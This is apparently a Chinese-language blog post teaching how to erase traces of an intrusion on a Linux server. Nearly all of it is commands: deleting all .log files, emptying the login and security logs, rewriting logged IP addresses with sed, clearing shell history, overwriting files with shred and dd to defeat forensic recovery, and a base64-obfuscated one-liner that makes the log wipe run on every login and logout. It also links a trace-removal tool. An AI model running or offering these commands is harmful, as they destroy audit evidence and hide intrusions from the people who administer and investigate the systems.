1、清除系统的日志

Linux的日志经常全部放在var/log日志上
删除当前目录下的日志
find ./ -name "*.log" -exec rm -v {} \;
删除系统全部的日志
find / -name "*.log" -exec rm -v {} \;
当然,上述两种命令都有点暴力,可能会删除一些我们不想删除的Log

/var/log/btmp 记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
我们可以直接置空对应的日志

  1. echo > /var/log/btmp 
  2. echo > /var/log/wtmp
  3. echo > /var/log/lastlog
  4. echo >   /var/log/utmp
  5. cat /dev/null >  /var/log/secure
  6. cat /dev/null >  /var/log/message

也可以进行IP替换伪造(这里我用btmp来进行测试发现会置空,但是其他日志文件应该是不会出现这种情况的)

  1. lastb | grep 117.71.59.108

image.png

  1. sed -i    's/202.148.28.83/11.11.11.11/g'    /var/log/btmp

lastb 经过在本地上的测试,发现这种方法会让替换的IP为空。
image.png

2、记得清除历史记录

1、history -c 将之前记录的值全删掉
2、vim ~/.bash_history 删掉你想删除的命令

3、shred防止取证,多次擦除数据。
shred -f -u -z -v -n 8 123.exe
image.png

2、dd命令

  1. dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数
  2. dd if=/dev/zero of=/home/ubuntu/1.exe bs=100 count=100

此时该文件的大小就会被强制写入混淆的数据,此时再将该程序删除,还原的东西也不是真的东西了。
image.png

一行代码清除

  1. echo aWYgWyAtZiB+Ly5iYXNocmMgXTsgdGhlbgoJLiB+Ly5iYXNocmMKZmkKUEFUSD0kUEFUSDokSE9NRS9iaW4KZXhwb3J0IFBBVEgKZWNobyA+IC92YXIvbG9nL2J0bXAKZWNobyA+IC92YXIvbG9nL2xhc3Rsb2cKZWNobyA+IC92YXIvbG9nL3d0bXAKZWNobyA+IC92YXIvbG9nL3V0bXAKZWNobyA+IC92YXIvbG9nL3NlY3VyZQplY2hvID4gL3Zhci9sb2cvbWVzc2FnZXMKZWNobyA+IH4vLmJhc2hfaGlzdG9yeQpoaXN0b3J5IC1j | base64 -d >> ~/.bash_profile;rm -f ~/.bash_logout;cp -f ~/.bash_profile ~/.bash_logout;chmod 644 ~/.bash_profile; chmod 644 ~/.bash_logoutss

Linux痕迹清除工具
https://github.com/JonGates/jon